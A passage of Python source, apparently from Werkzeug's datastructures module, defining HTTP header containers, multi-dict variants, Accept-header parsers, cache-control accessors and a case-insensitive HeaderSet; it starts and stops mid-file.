    (``filename='x'`` becomes ``filename=x``, ``max_age`` -> ``max-age``).
    """
    options = dict((name.replace('_', '-'), val)
                   for name, val in kw.items())
    return dump_options_header(value, options)
def _unicodify_header_value(value):
    """Coerce a header value to a text string; byte strings are decoded
    as latin-1, any other non-text object is converted with `text_type`.
    """
    if isinstance(value, bytes):
        return value.decode('latin-1')
    if isinstance(value, text_type):
        return value
    return text_type(value)
@native_itermethods(['keys', 'values', 'items'])
class Headers(object):
    """An object that stores some headers.  It has a dict-like interface
    but is ordered and can store the same keys multiple times.
    This data structure is useful if you want a nicer way to handle WSGI
    headers which are stored as tuples in a list.
    From Werkzeug 0.3 onwards, the :exc:`KeyError` raised by this class is
    also a subclass of the :class:`~exceptions.BadRequest` HTTP exception
    and will render a page for a ``400 BAD REQUEST`` if caught in a
    catch-all for HTTP exceptions.
    Headers is mostly compatible with the Python :class:`wsgiref.headers.Headers`
    class, with the exception of `__getitem__`.  :mod:`wsgiref` will return
    `None` for ``headers['missing']``, whereas :class:`Headers` will raise
    a :class:`KeyError`.
    To create a new :class:`Headers` object pass it a list or dict of headers
    which are used as default values.  This does not reuse the list passed
    to the constructor for internal usage.
    :param defaults: The list of default values for the :class:`Headers`.
    .. versionchanged:: 0.9
       This data structure now stores unicode values similar to how the
       multi dicts do it.  The main difference is that bytes can be set as
       well which will automatically be latin1 decoded.
    .. versionchanged:: 0.9
       The :meth:`linked` function was removed without replacement as it
       was an API that does not support the changes to the encoding model.
    """
    def __init__(self, defaults=None):
        # Internal storage: an ordered list of (key, value) tuples;
        # the defaults are always copied, never aliased.
        self._list = []
        if defaults is not None:
            if isinstance(defaults, (list, Headers)):
                self._list.extend(defaults)
            else:
                self.extend(defaults)
    def __getitem__(self, key, _get_mode=False):
        # Integer and slice keys index the raw list; string keys do a
        # case-insensitive header lookup.
        if not _get_mode:
            if isinstance(key, integer_types):
                return self._list[key]
            elif isinstance(key, slice):
                return self.__class__(self._list[key])
        if not isinstance(key, string_types):
            raise exceptions.BadRequestKeyError(key)
        ikey = key.lower()
        for k, v in self._list:
            if k.lower() == ikey:
                return v
        # micro optimization: if we are in get mode we will catch that
        # exception one stack level down so we can raise a standard
        # key error instead of our special one.
        if _get_mode:
            raise KeyError()
        raise exceptions.BadRequestKeyError(key)
    def __eq__(self, other):
        # Set comparison: header order and duplicate entries are ignored.
        return other.__class__ is self.__class__ and \
            set(other._list) == set(self._list)
    def __ne__(self, other):
        return not self.__eq__(other)
    def get(self, key, default=None, type=None, as_bytes=False):
        """Return the default value if the requested data doesn't exist.
        If `type` is provided and is a callable it should convert the value,
        return it or raise a :exc:`ValueError` if that is not possible.  In
        this case the function will return the default as if the value was not
        found:
        >>> d = Headers([('Content-Length', '42')])
        >>> d.get('Content-Length', type=int)
        42
        If a headers object is bound you must not add unicode strings
        because no encoding takes place.
        .. versionadded:: 0.9
           Added support for `as_bytes`.
        :param key: The key to be looked up.
        :param default: The default value to be returned if the key can't
                        be looked up.  If not further specified `None` is
                        returned.
        :param type: A callable that is used to cast the value in the
                     :class:`Headers`.  If a :exc:`ValueError` is raised
                     by this callable the default value is returned.
        :param as_bytes: return bytes instead of unicode strings.
        """
        try:
            rv = self.__getitem__(key, _get_mode=True)
        except KeyError:
            return default
        if as_bytes:
            rv = rv.encode('latin1')
        if type is None:
            return rv
        try:
            return type(rv)
        except ValueError:
            return default
    def getlist(self, key, type=None, as_bytes=False):
        """Return the list of items for a given key.  If that key is not in the
        :class:`Headers`, the return value will be an empty list.  Just as
        :meth:`get` :meth:`getlist` accepts a `type` parameter.  All items will
        be converted with the callable defined there.
        .. versionadded:: 0.9
           Added support for `as_bytes`.
        :param key: The key to be looked up.
        :param type: A callable that is used to cast the value in the
                     :class:`Headers`.  If a :exc:`ValueError` is raised
                     by this callable the value will be removed from the list.
        :return: a :class:`list` of all the values for the key.
        :param as_bytes: return bytes instead of unicode strings.
        """
        ikey = key.lower()
        result = []
        for k, v in self:
            if k.lower() == ikey:
                if as_bytes:
                    v = v.encode('latin1')
                if type is not None:
                    try:
                        v = type(v)
                    except ValueError:
                        continue
                result.append(v)
        return result
    def get_all(self, name):
        """Return a list of all the values for the named field.
        This method is compatible with the :mod:`wsgiref`
        :meth:`~wsgiref.headers.Headers.get_all` method.
        """
        return self.getlist(name)
    def items(self, lower=False):
        """Yield ``(key, value)`` pairs, optionally lower-casing the keys."""
        for key, value in self:
            if lower:
                key = key.lower()
            yield key, value
    def keys(self, lower=False):
        """Yield the header names, optionally lower-cased."""
        for key, _ in iteritems(self, lower):
            yield key
    def values(self):
        """Yield the header values."""
        for _, value in iteritems(self):
            yield value
    def extend(self, iterable):
        """Extend the headers with a dict or an iterable yielding keys and
        values.
        """
        if isinstance(iterable, dict):
            for key, value in iteritems(iterable):
                if isinstance(value, (tuple, list)):
                    # Multiple values per key.
                    for v in value:
                        self.add(key, v)
                else:
                    self.add(key, value)
        else:
            for key, value in iterable:
                self.add(key, value)
    def __delitem__(self, key, _index_operation=True):
        # Integer/slice keys delete by position; string keys remove every
        # (case-insensitive) occurrence of the header.
        if _index_operation and isinstance(key, (integer_types, slice)):
            del self._list[key]
            return
        key = key.lower()
        new = []
        for k, v in self._list:
            if k.lower() != key:
                new.append((k, v))
        self._list[:] = new
    def remove(self, key):
        """Remove a key.
        :param key: The key to be removed.
        """
        return self.__delitem__(key, _index_operation=False)
    def pop(self, key=None, default=_missing):
        """Removes and returns a key or index.
        :param key: The key to be popped.  If this is an integer the item at
                    that position is removed, if it's a string the value for
                    that key is.  If the key is omitted or `None` the last
                    item is removed.
        :return: an item.
        """
        if key is None:
            return self._list.pop()
        if isinstance(key, integer_types):
            return self._list.pop(key)
        try:
            rv = self[key]
            self.remove(key)
        except KeyError:
            if default is not _missing:
                return default
            raise
        return rv
    def popitem(self):
        """Removes a key or index and returns a (key, value) item."""
        return self.pop()
    def __contains__(self, key):
        """Check if a key is present."""
        try:
            self.__getitem__(key, _get_mode=True)
        except KeyError:
            return False
        return True
    has_key = __contains__
    def __iter__(self):
        """Yield ``(key, value)`` tuples."""
        return iter(self._list)
    def __len__(self):
        return len(self._list)
    def add(self, _key, _value, **kw):
        """Add a new header tuple to the list.
        Keyword arguments can specify additional parameters for the header
        value, with underscores converted to dashes::
        >>> d = Headers()
        >>> d.add('Content-Type', 'text/plain')
        >>> d.add('Content-Disposition', 'attachment', filename='foo.png')
        The keyword argument dumping uses :func:`dump_options_header`
        behind the scenes.
        .. versionadded:: 0.4.1
            keyword arguments were added for :mod:`wsgiref` compatibility.
        """
        if kw:
            _value = _options_header_vkw(_value, kw)
        _value = _unicodify_header_value(_value)
        self._validate_value(_value)
        self._list.append((_key, _value))
    def _validate_value(self, value):
        # Reject newlines: they would allow header injection / response
        # splitting (see the error message below).
        if not isinstance(value, text_type):
            raise TypeError('Value should be unicode.')
        if u'\n' in value or u'\r' in value:
            raise ValueError('Detected newline in header value.  This is '
                             'a potential security problem')
    def add_header(self, _key, _value, **_kw):
        """Add a new header tuple to the list.
        An alias for :meth:`add` for compatibility with the :mod:`wsgiref`
        :meth:`~wsgiref.headers.Headers.add_header` method.
        """
        self.add(_key, _value, **_kw)
    def clear(self):
        """Clears all headers."""
        del self._list[:]
    def set(self, _key, _value, **kw):
        """Remove all header tuples for `key` and add a new one.  The newly
        added key either appears at the end of the list if there was no
        entry or replaces the first one.
        Keyword arguments can specify additional parameters for the header
        value, with underscores converted to dashes.  See :meth:`add` for
        more information.
        .. versionchanged:: 0.6.1
           :meth:`set` now accepts the same arguments as :meth:`add`.
        :param _key: The key to be inserted.
        :param _value: The value to be inserted.
        """
        if kw:
            _value = _options_header_vkw(_value, kw)
        _value = _unicodify_header_value(_value)
        self._validate_value(_value)
        if not self._list:
            self._list.append((_key, _value))
            return
        listiter = iter(self._list)
        ikey = _key.lower()
        for idx, (old_key, old_value) in enumerate(listiter):
            if old_key.lower() == ikey:
                # replace first occurrence
                self._list[idx] = (_key, _value)
                break
        else:
            self._list.append((_key, _value))
            return
        # Drop any remaining occurrences of the key after the replaced one.
        self._list[idx + 1:] = [t for t in listiter if t[0].lower() != ikey]
    def setdefault(self, key, value):
        """Returns the value for the key if it is in the dict, otherwise it
        sets `value` for `key` and returns it.
        :param key: The key to be looked up.
        :param value: The value to be set (and returned) if the key is
                      not in the headers yet.
        """
        if key in self:
            return self[key]
        self.set(key, value)
        return value
    def __setitem__(self, key, value):
        """Like :meth:`set` but also supports index/slice based setting."""
        if isinstance(key, (slice, integer_types)):
            if isinstance(key, integer_types):
                value = [value]
            # Normalize and validate every assigned tuple before storing.
            value = [(k, _unicodify_header_value(v)) for (k, v) in value]
            [self._validate_value(v) for (k, v) in value]
            if isinstance(key, integer_types):
                self._list[key] = value[0]
            else:
                self._list[key] = value
        else:
            self.set(key, value)
    def to_list(self, charset='iso-8859-1'):
        """Convert the headers into a list suitable for WSGI."""
        # Deprecated: kept only to emit the warning below.
        from warnings import warn
        warn(DeprecationWarning('Method removed, use to_wsgi_list instead'),
             stacklevel=2)
        return self.to_wsgi_list()
    def to_wsgi_list(self):
        """Convert the headers into a list suitable for WSGI.
        The values are byte strings in Python 2 converted to latin1 and unicode
        strings in Python 3 for the WSGI server to encode.
        :return: list
        """
        if PY2:
            return [(k, v.encode('latin1')) for k, v in self]
        return list(self)
    def copy(self):
        """Return a copy backed by an independent header list."""
        return self.__class__(self._list)
    def __copy__(self):
        return self.copy()
    def __str__(self):
        """Returns formatted headers suitable for HTTP transmission."""
        strs = []
        for key, value in self.to_wsgi_list():
            strs.append('%s: %s' % (key, value))
        # Trailing element yields the blank line ending the header block.
        strs.append('\r\n')
        return '\r\n'.join(strs)
    def __repr__(self):
        return '%s(%r)' % (
            self.__class__.__name__,
            list(self)
        )
class ImmutableHeadersMixin(object):
    """Makes a :class:`Headers` immutable.  We do not mark them as
    hashable though since the only usecase for this datastructure
    in Werkzeug is a view on a mutable structure.
    .. versionadded:: 0.5
    :private:
    """
    def __delitem__(self, key):
        # Immutable: deletion is not supported.
        is_immutable(self)
    def __setitem__(self, key, value):
        # Immutable: assignment is not supported.
        is_immutable(self)
    set = __setitem__
    def add(self, item):
        # Immutable: adding headers is not supported.
        is_immutable(self)
    remove = add_header = add
    def extend(self, iterable):
        # Immutable: bulk extension is not supported.
        is_immutable(self)
    def insert(self, pos, value):
        # Immutable: insertion is not supported.
        is_immutable(self)
    def pop(self, index=-1):
        # Immutable: popping is not supported.
        is_immutable(self)
    def popitem(self):
        # Immutable: popping is not supported.
        is_immutable(self)
    def setdefault(self, key, default):
        # Immutable: inserting defaults is not supported.
        is_immutable(self)
class EnvironHeaders(ImmutableHeadersMixin, Headers):
    """Read only version of the headers from a WSGI environment.  This
    provides the same interface as `Headers` and is constructed from
    a WSGI environment.
    From Werkzeug 0.3 onwards, the `KeyError` raised by this class is also a
    subclass of the :exc:`~exceptions.BadRequest` HTTP exception and will
    render a page for a ``400 BAD REQUEST`` if caught in a catch-all for
    HTTP exceptions.
    """
    def __init__(self, environ):
        # Deliberately does not call Headers.__init__: there is no backing
        # ``_list``; every read goes straight to the WSGI environ.
        self.environ = environ
    def __eq__(self, other):
        # NOTE(review): identity comparison of the environ dicts; comparing
        # against an object without an ``environ`` attribute raises
        # AttributeError instead of returning NotImplemented -- confirm
        # callers only compare EnvironHeaders with each other.
        return self.environ is other.environ
    def __getitem__(self, key, _get_mode=False):
        # _get_mode is a no-op for this class as there is no index but
        # used because get() calls it.
        # Header names map to environ keys: e.g. X-Forwarded-For ->
        # HTTP_X_FORWARDED_FOR; Content-Type/Length have no HTTP_ prefix.
        key = key.upper().replace('-', '_')
        if key in ('CONTENT_TYPE', 'CONTENT_LENGTH'):
            return _unicodify_header_value(self.environ[key])
        return _unicodify_header_value(self.environ['HTTP_' + key])
    def __len__(self):
        # the iter is necessary because otherwise list calls our
        # len which would call list again and so forth.
        return len(list(iter(self)))
    def __iter__(self):
        for key, value in iteritems(self.environ):
            if key.startswith('HTTP_') and key not in \
               ('HTTP_CONTENT_TYPE', 'HTTP_CONTENT_LENGTH'):
                # HTTP_X_FORWARDED_FOR -> X-Forwarded-For
                yield (key[5:].replace('_', '-').title(),
                       _unicodify_header_value(value))
            elif key in ('CONTENT_TYPE', 'CONTENT_LENGTH'):
                yield (key.replace('_', '-').title(),
                       _unicodify_header_value(value))
    def copy(self):
        # Copying is unsupported: there is no way to snapshot a live
        # environ view meaningfully.
        raise TypeError('cannot create %r copies' % self.__class__.__name__)
@native_itermethods(['keys', 'values', 'items', 'lists', 'listvalues'])
class CombinedMultiDict(ImmutableMultiDictMixin, MultiDict):
    """A read only :class:`MultiDict` that you can pass multiple :class:`MultiDict`
    instances as sequence and it will combine the return values of all wrapped
    dicts:
    >>> from werkzeug.datastructures import CombinedMultiDict, MultiDict
    >>> post = MultiDict([('foo', 'bar')])
    >>> get = MultiDict([('blub', 'blah')])
    >>> combined = CombinedMultiDict([get, post])
    >>> combined['foo']
    'bar'
    >>> combined['blub']
    'blah'
    This works for all read operations and will raise a `TypeError` for
    methods that usually change data which isn't possible.
    From Werkzeug 0.3 onwards, the `KeyError` raised by this class is also a
    subclass of the :exc:`~exceptions.BadRequest` HTTP exception and will
    render a page for a ``400 BAD REQUEST`` if caught in a catch-all for HTTP
    exceptions.
    """
    def __reduce_ex__(self, protocol):
        # Pickle by reconstructing from the wrapped dicts.
        return type(self), (self.dicts,)
    def __init__(self, dicts=None):
        # Ordered sequence of wrapped dicts; earlier dicts take
        # precedence on lookups.
        self.dicts = dicts or []
    @classmethod
    def fromkeys(cls):
        raise TypeError('cannot create %r instances by fromkeys' %
                        cls.__name__)
    def __getitem__(self, key):
        # First wrapped dict containing the key wins.
        for d in self.dicts:
            if key in d:
                return d[key]
        raise exceptions.BadRequestKeyError(key)
    def get(self, key, default=None, type=None):
        for d in self.dicts:
            if key in d:
                if type is not None:
                    try:
                        return type(d[key])
                    except ValueError:
                        # Conversion failed: fall through to later dicts.
                        continue
                return d[key]
        return default
    def getlist(self, key, type=None):
        """Concatenate the value lists of all wrapped dicts for `key`."""
        rv = []
        for d in self.dicts:
            rv.extend(d.getlist(key, type))
        return rv
    def keys(self):
        """Iterate over the union of all wrapped dicts' keys."""
        rv = set()
        for d in self.dicts:
            rv.update(d.keys())
        return iter(rv)
    __iter__ = keys
    def items(self, multi=False):
        # With multi=False, the first dict that yields a key shadows
        # later ones.
        found = set()
        for d in self.dicts:
            for key, value in iteritems(d, multi):
                if multi:
                    yield key, value
                elif key not in found:
                    found.add(key)
                    yield key, value
    def values(self):
        for key, value in iteritems(self):
            yield value
    def lists(self):
        """Yield ``(key, combined_value_list)`` pairs."""
        rv = {}
        for d in self.dicts:
            for key, values in iterlists(d):
                rv.setdefault(key, []).extend(values)
        return iteritems(rv)
    def listvalues(self):
        return (x[1] for x in self.lists())
    def copy(self):
        """Return a shallow copy of this object."""
        return self.__class__(self.dicts[:])
    def to_dict(self, flat=True):
        """Return the contents as regular dict.  If `flat` is `True` the
        returned dict will only have the first item present, if `flat` is
        `False` all values will be returned as lists.
        :param flat: If set to `False` the dict returned will have lists
                     with all the values in it.  Otherwise it will only
                     contain the first item for each key.
        :return: a :class:`dict`
        """
        rv = {}
        # Reversed so that earlier dicts overwrite later ones, matching
        # the lookup precedence of __getitem__.
        for d in reversed(self.dicts):
            rv.update(d.to_dict(flat))
        return rv
    def __len__(self):
        # Bug fix: ``len(self.keys())`` raised TypeError on Python 3
        # because :meth:`keys` returns an iterator there
        # (native_itermethods only materializes a list on Python 2).
        # Count the union of keys directly instead.
        rv = set()
        for d in self.dicts:
            rv.update(d.keys())
        return len(rv)
    def __contains__(self, key):
        for d in self.dicts:
            if key in d:
                return True
        return False
    has_key = __contains__
    def __repr__(self):
        return '%s(%r)' % (self.__class__.__name__, self.dicts)
class FileMultiDict(MultiDict):
    """A :class:`MultiDict` subclass with a convenience method for adding
    uploaded files.  This is used by :class:`EnvironBuilder` and is
    generally useful for unittesting.
    .. versionadded:: 0.5
    """
    def add_file(self, name, file, filename=None, content_type=None):
        """Adds a new file to the dict.  `file` can be a file name or
        a :class:`file`-like or a :class:`FileStorage` object.
        :param name: the name of the field.
        :param file: a filename or :class:`file`-like object
        :param filename: an optional filename
        :param content_type: an optional content type
        """
        if not isinstance(file, FileStorage):
            # A plain string is treated as a path on disk.
            if isinstance(file, string_types):
                if filename is None:
                    filename = file
                file = open(file, 'rb')
            if filename and content_type is None:
                # Guess from the filename, defaulting to a generic
                # binary type.
                content_type = mimetypes.guess_type(filename)[0] or \
                    'application/octet-stream'
            file = FileStorage(file, filename, name, content_type)
        self.add(name, file)
class ImmutableDict(ImmutableDictMixin, dict):
    """An immutable :class:`dict`.
    .. versionadded:: 0.5
    """
    def __repr__(self):
        return '%s(%s)' % (
            self.__class__.__name__,
            dict.__repr__(self),
        )
    def copy(self):
        """Return a shallow mutable copy of this object.  Keep in mind that
        the standard library's :func:`copy` function is a no-op for this class
        like for any other python immutable type (eg: :class:`tuple`).
        """
        return dict(self)
    def __copy__(self):
        # copy.copy() of an immutable object can safely return the object
        # itself.
        return self
class ImmutableMultiDict(ImmutableMultiDictMixin, MultiDict):
    """An immutable :class:`MultiDict`.
    .. versionadded:: 0.5
    """
    def copy(self):
        """Return a shallow mutable copy of this object.  Keep in mind that
        the standard library's :func:`copy` function is a no-op for this class
        like for any other python immutable type (eg: :class:`tuple`).
        """
        return MultiDict(self)
    def __copy__(self):
        # copy.copy() of an immutable object can safely return the object
        # itself.
        return self
class ImmutableOrderedMultiDict(ImmutableMultiDictMixin, OrderedMultiDict):
    """An immutable :class:`OrderedMultiDict`.
    .. versionadded:: 0.6
    """
    def _iter_hashitems(self):
        # Include the position in the hash items so that two dicts with the
        # same pairs in a different order hash differently.
        return enumerate(iteritems(self, multi=True))
    def copy(self):
        """Return a shallow mutable copy of this object.  Keep in mind that
        the standard library's :func:`copy` function is a no-op for this class
        like for any other python immutable type (eg: :class:`tuple`).
        """
        return OrderedMultiDict(self)
    def __copy__(self):
        # copy.copy() of an immutable object can safely return the object
        # itself.
        return self
@native_itermethods(['values'])
class Accept(ImmutableList):
    """An :class:`Accept` object is just a list subclass for lists of
    ``(value, quality)`` tuples.  It is automatically sorted by quality.

    All :class:`Accept` objects work similar to a list but provide extra
    functionality for working with the data.  Containment checks are
    normalized to the rules of that header:

    >>> a = CharsetAccept([('ISO-8859-1', 1), ('utf-8', 0.7)])
    >>> a.best
    'ISO-8859-1'
    >>> 'iso-8859-1' in a
    True
    >>> 'UTF8' in a
    True
    >>> 'utf7' in a
    False

    To get the quality for an item you can use normal item lookup:

    >>> print a['utf-8']
    0.7
    >>> a['utf7']
    0

    .. versionchanged:: 0.5
       :class:`Accept` objects are forced immutable now.
    """

    def __init__(self, values=()):
        if values is None:
            # Header absent entirely: empty accept list; ``provided`` lets
            # callers distinguish "no header" from an empty header value.
            list.__init__(self)
            self.provided = False
        elif isinstance(values, Accept):
            # Copy constructor: preserve the ``provided`` flag.
            self.provided = values.provided
            list.__init__(self, values)
        else:
            self.provided = True
            # Sort the ``(value, quality)`` pairs by descending quality by
            # flipping them to ``(quality, value)`` for the sort, then
            # flipping back.
            values = [(a, b) for b, a in values]
            values.sort()
            values.reverse()
            list.__init__(self, [(a, b) for b, a in values])

    def _value_matches(self, value, item):
        """Check if a value matches a given accept item."""
        # Subclasses override this to apply header-specific normalization
        # (mimetypes, languages, charsets).
        return item == '*' or item.lower() == value.lower()

    def __getitem__(self, key):
        """Besides index lookup (getting item n) you can also pass it a string
        to get the quality for the item.  If the item is not in the list, the
        returned quality is ``0``.
        """
        if isinstance(key, string_types):
            return self.quality(key)
        return list.__getitem__(self, key)

    def quality(self, key):
        """Returns the quality of the key.

        .. versionadded:: 0.6
           In previous versions you had to use the item-lookup syntax
           (eg: ``obj[key]`` instead of ``obj.quality(key)``)
        """
        for item, quality in self:
            if self._value_matches(key, item):
                return quality
        return 0

    def __contains__(self, value):
        for item, quality in self:
            if self._value_matches(value, item):
                return True
        return False

    def __repr__(self):
        return '%s([%s])' % (
            self.__class__.__name__,
            ', '.join('(%r, %s)' % (x, y) for x, y in self)
        )

    def index(self, key):
        """Get the position of an entry or raise :exc:`ValueError`.

        :param key: The key to be looked up.

        .. versionchanged:: 0.5
           This used to raise :exc:`IndexError`, which was inconsistent
           with the list API.
        """
        if isinstance(key, string_types):
            for idx, (item, quality) in enumerate(self):
                if self._value_matches(key, item):
                    return idx
            raise ValueError(key)
        return list.index(self, key)

    def find(self, key):
        """Get the position of an entry or return -1.

        :param key: The key to be looked up.
        """
        try:
            return self.index(key)
        except ValueError:
            return -1

    def values(self):
        """Iterate over all values."""
        for item in self:
            yield item[0]

    def to_header(self):
        """Convert the header set into an HTTP header string."""
        result = []
        for value, quality in self:
            if quality != 1:
                # A quality of 1 is the default and may be omitted.
                value = '%s;q=%s' % (value, quality)
            result.append(value)
        return ','.join(result)

    def __str__(self):
        return self.to_header()

    def best_match(self, matches, default=None):
        """Returns the best match from a list of possible matches based
        on the quality of the client.  If two items have the same quality,
        the one is returned that comes first.

        :param matches: a list of matches to check for
        :param default: the value that is returned if none match
        """
        best_quality = -1
        result = default
        for server_item in matches:
            for client_item, quality in self:
                if quality <= best_quality:
                    # The list is sorted by descending quality, so no later
                    # client entry can beat the current best for this item.
                    break
                if self._value_matches(server_item, client_item):
                    best_quality = quality
                    result = server_item
        return result

    @property
    def best(self):
        """The best match as value."""
        # Implicitly returns None for an empty accept list.
        if self:
            return self[0][0]
class MIMEAccept(Accept):
    """Like :class:`Accept` but with special methods and behavior for
    mimetypes.
    """

    def _value_matches(self, value, item):
        # Normalize a mimetype to a ``(type, subtype)`` pair; a bare
        # ``'*'`` counts as the full wildcard ``('*', '*')``.
        def _normalize(x):
            x = x.lower()
            return x == '*' and ('*', '*') or x.split('/', 1)

        # this is from the application which is trusted.  to avoid developer
        # frustration we actually check these for valid values
        if '/' not in value:
            raise ValueError('invalid mimetype %r' % value)
        value_type, value_subtype = _normalize(value)
        if value_type == '*' and value_subtype != '*':
            # ``*/subtype`` is not a valid wildcard form.
            raise ValueError('invalid mimetype %r' % value)

        if '/' not in item:
            # Malformed client-side entries are silently ignored rather
            # than rejected with an exception.
            return False
        item_type, item_subtype = _normalize(item)
        if item_type == '*' and item_subtype != '*':
            return False
        # Match when either side is the full wildcard, or when the types
        # agree and either subtype is a wildcard or both are equal.
        return (
            (item_type == item_subtype == '*' or
             value_type == value_subtype == '*') or
            (item_type == value_type and (item_subtype == '*' or
                                          value_subtype == '*' or
                                          item_subtype == value_subtype))
        )

    @property
    def accept_html(self):
        """True if this object accepts HTML."""
        return (
            'text/html' in self or
            'application/xhtml+xml' in self or
            self.accept_xhtml
        )

    @property
    def accept_xhtml(self):
        """True if this object accepts XHTML."""
        return (
            'application/xhtml+xml' in self or
            'application/xml' in self
        )

    @property
    def accept_json(self):
        """True if this object accepts JSON."""
        return 'application/json' in self
class LanguageAccept(Accept):
    """Like :class:`Accept` but with normalization for languages."""

    def _value_matches(self, value, item):
        # The wildcard accepts any language.
        if item == '*':
            return True

        def _split(language):
            # Compare on the lowercased locale components so that e.g.
            # ``en-US`` and ``en_us`` are treated as equal.
            return _locale_delim_re.split(language.lower())

        return _split(value) == _split(item)
class CharsetAccept(Accept):
    """Like :class:`Accept` but with normalization for charsets."""

    def _value_matches(self, value, item):
        def _canonical(name):
            # Resolve codec aliases (e.g. ``latin1`` -> ``iso8859-1``);
            # fall back to simple lowercasing for unknown names.
            try:
                return codecs.lookup(name).name
            except LookupError:
                return name.lower()

        return item == '*' or _canonical(value) == _canonical(item)
def cache_property(key, empty, type):
    """Return a new property object for a cache header.  Useful if you
    want to add support for a cache extension in a subclass.

    :param key: the directive name as it appears in the header.
    :param empty: placeholder reported when the directive is present
                  without a value.
    :param type: optional callable used to coerce the raw string value.
    """
    def fget(obj):
        return obj._get_cache_value(key, empty, type)

    def fset(obj, value):
        obj._set_cache_value(key, value, type)

    def fdel(obj):
        obj._del_cache_value(key)

    return property(fget, fset, fdel, 'accessor for %r' % key)
class _CacheControl(UpdateDictMixin, dict):
    """Subclass of a dict that stores values for a Cache-Control header.  It
    has accessors for all the cache-control directives specified in RFC 2616.
    The class does not differentiate between request and response directives.

    Because the cache-control directives in the HTTP header use dashes the
    python descriptors use underscores for that.

    To get a header of the :class:`CacheControl` object again you can convert
    the object into a string or call the :meth:`to_header` method.  If you plan
    to subclass it and add your own items have a look at the sourcecode for
    that class.

    .. versionchanged:: 0.4

       Setting `no_cache` or `private` to boolean `True` will set the implicit
       none-value which is ``*``:

       >>> cc = ResponseCacheControl()
       >>> cc.no_cache = True
       >>> cc
       <ResponseCacheControl 'no-cache'>
       >>> cc.no_cache
       '*'
       >>> cc.no_cache = None
       >>> cc
       <ResponseCacheControl ''>

       In versions before 0.5 the behavior documented here affected the now
       no longer existing `CacheControl` class.
    """

    no_cache = cache_property('no-cache', '*', None)
    no_store = cache_property('no-store', None, bool)
    max_age = cache_property('max-age', -1, int)
    no_transform = cache_property('no-transform', None, None)

    def __init__(self, values=(), on_update=None):
        dict.__init__(self, values or ())
        self.on_update = on_update
        # ``provided`` is False only when ``values`` is explicitly None,
        # i.e. no Cache-Control header was present at all.
        self.provided = values is not None

    def _get_cache_value(self, key, empty, type):
        """Used internally by the accessor properties."""
        if type is bool:
            return key in self
        if key in self:
            value = self[key]
            if value is None:
                # Directive present without a value (e.g. ``no-cache``):
                # report the configured placeholder.
                return empty
            elif type is not None:
                try:
                    value = type(value)
                except ValueError:
                    # Malformed value: fall back to the raw string.
                    pass
            return value

    def _set_cache_value(self, key, value, type):
        """Used internally by the accessor properties."""
        if type is bool:
            if value:
                self[key] = None
            else:
                self.pop(key, None)
        else:
            if value is None:
                # Clearing a directive must be idempotent.  This previously
                # used ``self.pop(key)`` which raised KeyError when the
                # directive was not set (e.g. ``cc.max_age = None`` on a
                # fresh object); mirror the bool branch instead.
                self.pop(key, None)
            elif value is True:
                self[key] = None
            else:
                self[key] = value

    def _del_cache_value(self, key):
        """Used internally by the accessor properties."""
        if key in self:
            del self[key]

    def to_header(self):
        """Convert the stored values into a cache control header."""
        return dump_header(self)

    def __str__(self):
        return self.to_header()

    def __repr__(self):
        return '<%s %r>' % (
            self.__class__.__name__,
            self.to_header()
        )
class RequestCacheControl(ImmutableDictMixin, _CacheControl):
    """A cache control for requests.  This is immutable and gives access
    to all the request-relevant cache control headers.

    To get a header of the :class:`RequestCacheControl` object again you can
    convert the object into a string or call the :meth:`to_header` method.  If
    you plan to subclass it and add your own items have a look at the sourcecode
    for that class.

    .. versionadded:: 0.5
       In previous versions a `CacheControl` class existed that was used
       both for request and response.
    """

    # Request-only directives; ``'*'`` is the placeholder value reported
    # when the directive is present in the header without a value.
    max_stale = cache_property('max-stale', '*', int)
    min_fresh = cache_property('min-fresh', '*', int)
    no_transform = cache_property('no-transform', None, None)
    only_if_cached = cache_property('only-if-cached', None, bool)
class ResponseCacheControl(_CacheControl):
    """A cache control for responses.  Unlike :class:`RequestCacheControl`
    this is mutable and gives access to response-relevant cache control
    headers.

    To get a header of the :class:`ResponseCacheControl` object again you can
    convert the object into a string or call the :meth:`to_header` method.  If
    you plan to subclass it and add your own items have a look at the sourcecode
    for that class.

    .. versionadded:: 0.5
       In previous versions a `CacheControl` class existed that was used
       both for request and response.
    """

    # Response-only directives.  ``private`` reports ``'*'`` when present
    # without an explicit field-name list.
    public = cache_property('public', None, bool)
    private = cache_property('private', '*', None)
    must_revalidate = cache_property('must-revalidate', None, bool)
    proxy_revalidate = cache_property('proxy-revalidate', None, bool)
    s_maxage = cache_property('s-maxage', None, None)
# Attach ``cache_property`` to ``_CacheControl`` as a staticmethod so that
# subclasses can reuse it to define accessors for cache extensions.
_CacheControl.cache_property = staticmethod(cache_property)
class CallbackDict(UpdateDictMixin, dict):
    """A dict that calls a function passed every time something is changed.
    The function is passed the dict instance.
    """

    def __init__(self, initial=None, on_update=None):
        # ``UpdateDictMixin`` invokes ``on_update`` (if not None) from
        # every mutating dict method.
        dict.__init__(self, initial or ())
        self.on_update = on_update

    def __repr__(self):
        return '<{0} {1}>'.format(
            type(self).__name__,
            dict.__repr__(self),
        )
class HeaderSet(object):
    """Similar to the :class:`ETags` class this implements a set-like structure.
    Unlike :class:`ETags` this is case insensitive and used for vary, allow, and
    content-language headers.

    If not constructed using the :func:`parse_set_header` function the
    instantiation works like this:

    >>> hs = HeaderSet(['foo', 'bar', 'baz'])
    >>> hs
    HeaderSet(['foo', 'bar', 'baz'])
    """

    def __init__(self, headers=None, on_update=None):
        # ``_headers`` keeps the original casing and order for display;
        # ``_set`` holds the lowercased names for O(1) membership tests.
        self._headers = list(headers or ())
        self._set = set([x.lower() for x in self._headers])
        self.on_update = on_update

    def add(self, header):
        """Add a new header to the set."""
        self.update((header,))

    def remove(self, header):
        """Remove a header from the set.  This raises an :exc:`KeyError` if the
        header is not in the set.

        .. versionchanged:: 0.5
            In older versions a :exc:`IndexError` was raised instead of a
            :exc:`KeyError` if the object was missing.

        :param header: the header to be removed.
        """
        key = header.lower()
        if key not in self._set:
            raise KeyError(header)
        self._set.remove(key)
        for idx, stored in enumerate(self._headers):
            # Compare case-insensitively against the lowered key.  This
            # previously compared the lowered stored value against the
            # original-case argument, which left the display list out of
            # sync with ``_set`` for e.g. ``hs.remove('FOO')``.
            if stored.lower() == key:
                del self._headers[idx]
                break
        if self.on_update is not None:
            self.on_update(self)

    def update(self, iterable):
        """Add all the headers from the iterable to the set.

        :param iterable: updates the set with the items from the iterable.
        """
        inserted_any = False
        for header in iterable:
            key = header.lower()
            if key not in self._set:
                self._headers.append(header)
                self._set.add(key)
                inserted_any = True
        # Notify only once per bulk update, and only if something changed.
